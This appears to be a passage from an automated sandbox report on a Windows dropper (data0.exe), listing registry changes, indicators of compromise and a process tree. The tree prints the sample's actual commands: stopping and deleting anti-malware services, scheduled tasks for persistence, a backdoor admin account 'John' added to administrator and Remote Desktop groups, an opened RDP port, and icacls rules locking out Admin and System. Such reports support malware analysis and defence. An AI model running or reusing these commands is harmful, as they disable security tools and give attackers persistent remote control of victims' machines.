\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%systemroot%\system32\provsvc.dll,-203 = "HomeGroup Out" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@wifidisplay.dll,-10200 = "Wireless Display (TCP-In)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%windir%\system32\diagtrack.dll,-3001 = "Connected User Experiences and Telemetry" winserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes winserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8 winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@peerdistsh.dll,-10006 = "BranchCache Hosted Cache Client (HTTP-Out)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@wifidisplay.dll,-10206 = "Wireless Display Infrastructure Back Channel (TCP-In)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@netlogon.dll,-1008 = "Netlogon Service Authz (RPC)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%systemroot%\system32\dosvc.dll,-102 = "Delivery Optimization (TCP-In)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall" winserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings winserv.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri\1d2a058e0b92f6f\a01460c8\LanguageList = 5f0065006e002d00550053003b0065006e005f007300740061006e0064006100720064005f003100300030005f00550053005f004c00540052005f006400610072006b005f004400650073006b0074006f007000 winserv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CEnvironmentsApp_cw5n1h2txyewy%5Cresources.pri winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37303 = "mDNS (UDP-In)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%systemroot%\system32\provsvc.dll,-205 = "HomeGroup In (PNRP)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@wifidisplay.dll,-10204 = "Wireless Display (UDP-Out)" winserv.exe Key created \REGISTRY\USER\.DEFAULT\Software winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@peerdistsh.dll,-10005 = "BranchCache Hosted Cache Server(HTTP-Out)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@peerdistsh.dll,-10004 = "BranchCache Hosted Cache Server (HTTP-In)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@peerdistsh.dll,-10001 = "BranchCache Content Retrieval (HTTP-Out)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@peerdistsh.dll,-10000 = "BranchCache Content Retrieval (HTTP-In)" winserv.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@%systemroot%\system32\provsvc.dll,-200 = "HomeGroup In" winserv.exe -
NTFS ADS 5 IoCs
description ioc Process File opened for modification C:\ProgramData\ReaItekHD\winmgmts:\localhost\root\CIMV2 taskhost.exe File opened for modification C:\ProgramData\ReaItekHD\winmgmts:\localhost\ taskhost.exe File opened for modification C:\ProgramData\Setup\winmgmts:\ IP.exe File opened for modification C:\ProgramData\Setup\WinMgmts:\ IP.exe File opened for modification C:\ProgramData\Setup\winmgmts:\ smss.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1324 schtasks.exe 2872 schtasks.exe 976 schtasks.exe 3148 schtasks.exe 3920 schtasks.exe 4024 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 4632 GameGuard.exe 496 update.exe 496 update.exe 496 update.exe 496 update.exe 496 update.exe 496 update.exe 496 update.exe 496 update.exe 1996 taskhost.exe 1996 taskhost.exe 3468 winserv.exe 3468 winserv.exe 3468 winserv.exe 3468 winserv.exe 3468 winserv.exe 3468 winserv.exe 2232 winserv.exe 2232 winserv.exe 2232 winserv.exe 2232 winserv.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4156 svchost.exe 4156 svchost.exe 4156 svchost.exe 4156 svchost.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe 4968 taskhostw.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 4968 taskhostw.exe 1996 taskhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 608 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 3468 winserv.exe Token: SeTakeOwnershipPrivilege 2232 winserv.exe Token: SeTcbPrivilege 2232 winserv.exe Token: SeTcbPrivilege 2232 winserv.exe Token: SeDebugPrivilege 3952 RDPWinst.exe Token: SeAuditPrivilege 4156 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4544 data0.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 4632 GameGuard.exe 496 update.exe 4652 Game.exe 1996 taskhost.exe 4968 taskhostw.exe 5088 svchost.exe 856 IP.exe 2448 smss.exe 3468 winserv.exe 3468 winserv.exe 3468 winserv.exe 3468 winserv.exe 3468 winserv.exe 2232 winserv.exe 2232 winserv.exe 2232 winserv.exe 2232 winserv.exe 3920 Packs.exe 3952 RDPWinst.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4544 wrote to memory of 4632 4544 data0.exe 82 PID 4544 wrote to memory of 4632 4544 data0.exe 82 PID 4544 wrote to memory of 496 4544 data0.exe 84 PID 4544 wrote to memory of 496 4544 data0.exe 84 PID 4632 wrote to memory of 3680 4632 GameGuard.exe 85 PID 4632 wrote to memory of 3680 4632 GameGuard.exe 85 PID 4632 wrote to memory of 4704 4632 GameGuard.exe 87 PID 4632 wrote to memory of 4704 4632 GameGuard.exe 87 PID 3680 wrote to memory of 1388 3680 cmd.exe 89 PID 3680 wrote to memory of 1388 3680 cmd.exe 89 PID 4632 wrote to memory of 4948 4632 GameGuard.exe 90 PID 4632 wrote to memory of 4948 4632 GameGuard.exe 90 PID 4704 wrote to memory of 2968 4704 cmd.exe 92 PID 4704 wrote to memory of 2968 4704 cmd.exe 92 PID 4632 wrote to memory of 5036 4632 GameGuard.exe 93 PID 4632 wrote to memory of 5036 4632 GameGuard.exe 93 PID 4948 wrote to memory of 3224 4948 cmd.exe 95 PID 4948 wrote to memory of 3224 4948 cmd.exe 95 PID 5036 wrote to memory of 1516 5036 cmd.exe 96 PID 5036 wrote to memory of 1516 5036 cmd.exe 96 PID 4632 wrote to memory of 1616 4632 GameGuard.exe 97 PID 4632 wrote to memory of 1616 4632 GameGuard.exe 97 PID 4632 wrote to memory of 5104 4632 GameGuard.exe 99 PID 4632 wrote to memory of 5104 4632 GameGuard.exe 99 PID 4632 wrote to memory of 360 4632 GameGuard.exe 101 PID 4632 wrote to memory of 360 4632 GameGuard.exe 101 PID 4632 wrote to memory of 4108 4632 GameGuard.exe 102 PID 4632 wrote to memory of 4108 4632 GameGuard.exe 102 PID 1616 wrote to memory of 4224 1616 cmd.exe 105 PID 1616 wrote to memory of 4224 1616 cmd.exe 105 PID 360 wrote to memory of 4752 360 cmd.exe 106 PID 360 wrote to memory of 4752 360 cmd.exe 106 PID 5104 wrote to memory of 4152 5104 cmd.exe 107 PID 5104 wrote to memory of 4152 5104 cmd.exe 107 PID 4108 wrote to memory of 2696 4108 cmd.exe 108 PID 4108 wrote to memory of 2696 4108 cmd.exe 108 PID 4632 wrote to memory of 5000 4632 GameGuard.exe 109 PID 4632 wrote to memory of 5000 4632 GameGuard.exe 109 PID 5000 wrote to memory of 972 5000 cmd.exe 111 PID 5000 wrote to memory of 972 5000 cmd.exe 111 PID 4632 wrote to memory of 4008 4632 GameGuard.exe 112 PID 4632 wrote to memory of 4008 4632 GameGuard.exe 112 PID 4008 wrote to memory of 4992 4008 cmd.exe 114 PID 4008 wrote to memory of 4992 4008 cmd.exe 114 PID 4632 wrote to memory of 3820 4632 GameGuard.exe 115 PID 4632 wrote to memory of 3820 4632 GameGuard.exe 115 PID 3820 wrote to memory of 2216 3820 cmd.exe 117 PID 3820 wrote to memory of 2216 3820 cmd.exe 117 PID 4632 wrote to memory of 4404 4632 GameGuard.exe 118 PID 4632 wrote to memory of 4404 4632 GameGuard.exe 118 PID 4404 wrote to memory of 1156 4404 cmd.exe 120 PID 4404 wrote to memory of 1156 4404 cmd.exe 120 PID 4632 wrote to memory of 2716 4632 GameGuard.exe 121 PID 4632 wrote to memory of 2716 4632 GameGuard.exe 121 PID 2716 wrote to memory of 3492 2716 cmd.exe 123 PID 2716 wrote to memory of 3492 2716 cmd.exe 123 PID 4632 wrote to memory of 2132 4632 GameGuard.exe 124 PID 4632 wrote to memory of 2132 4632 GameGuard.exe 124 PID 4632 wrote to memory of 2228 4632 GameGuard.exe 125 PID 4632 wrote to memory of 2228 4632 GameGuard.exe 125 PID 2132 wrote to memory of 5012 2132 cmd.exe 128 PID 2132 wrote to memory of 5012 2132 cmd.exe 128 PID 2228 wrote to memory of 2928 2228 cmd.exe 129 PID 2228 wrote to memory of 2928 2228 cmd.exe 129 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\data0.exe"C:\Users\Admin\AppData\Local\Temp\data0.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\ProgramData\Setup\GameGuard.exe"C:\ProgramData\Setup\GameGuard.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Blocks application from running via registry modification
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\system32\sc.exesc delete swprv4⤵
- Launches sc.exe
PID:1388
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\system32\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:2968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
PID:3224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:1516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\sc.exesc delete mbamservice4⤵
- Launches sc.exe
PID:4224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\sc.exesc delete crmsvc4⤵
- Launches sc.exe
PID:4152
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1156
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force3⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\gpupdate.exegpupdate /force4⤵PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\Delete.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\system32\timeout.exetimeout 54⤵
- Delays execution with timeout.exe
PID:2928
-
-
-
-
C:\ProgramData\Setup\update.exe"C:\ProgramData\Setup\update.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:496 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\RealtekCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1324
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2872
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:976
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\TaskCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3148
-
-
C:\ProgramData\Setup\Game.exeC:\ProgramData\Setup\Game.exe -ppidar3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4652 -
C:\ProgramData\ReaItekHD\taskhost.exe"C:\ProgramData\ReaItekHD\taskhost.exe"4⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵PID:1964
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
PID:4288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵PID:3268
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵PID:4684
-
-
-
C:\ProgramData\Setup\Packs.exeC:\ProgramData\Setup\Packs.exe -ppidar5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3920
-
-
-
C:\ProgramData\ReaItekHD\taskhostw.exe"C:\ProgramData\ReaItekHD\taskhostw.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4968
-
-
-
C:\ProgramData\Setup\svchost.exeC:\ProgramData\Setup\svchost.exe -ppidar3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5088 -
C:\ProgramData\Setup\IP.exe"C:\ProgramData\Setup\IP.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:856
-
-
C:\ProgramData\Setup\smss.exe"C:\ProgramData\Setup\smss.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:2448 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:3920
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:4024
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3468 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second6⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add5⤵PID:2128
-
C:\Windows\system32\net.exenet user John 12345 /add6⤵PID:3360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add7⤵PID:1704
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add5⤵PID:4556
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add6⤵PID:4988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add7⤵PID:420
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add5⤵PID:3028
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add6⤵PID:4040
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add7⤵PID:4956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add5⤵PID:4584
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add6⤵PID:2668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add7⤵PID:684
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add5⤵PID:4288
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add6⤵PID:4284
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add7⤵PID:4612
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add5⤵PID:3820
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add6⤵PID:1060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add7⤵PID:2716
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add5⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2552 -
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add6⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:5024 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add7⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2208
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i5⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3952 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1388
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat3⤵
- Drops file in Drivers directory
PID:4936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵PID:1960
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:4636
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵PID:4744
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵PID:3312
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5040
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵PID:4704
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3520
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵PID:4184
-
C:\Windows\system32\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵PID:772
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:3800
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:4016
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4988
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵PID:1352
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵PID:1076
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1748
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵PID:4040
-
C:\Windows\system32\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4268
-
-
-
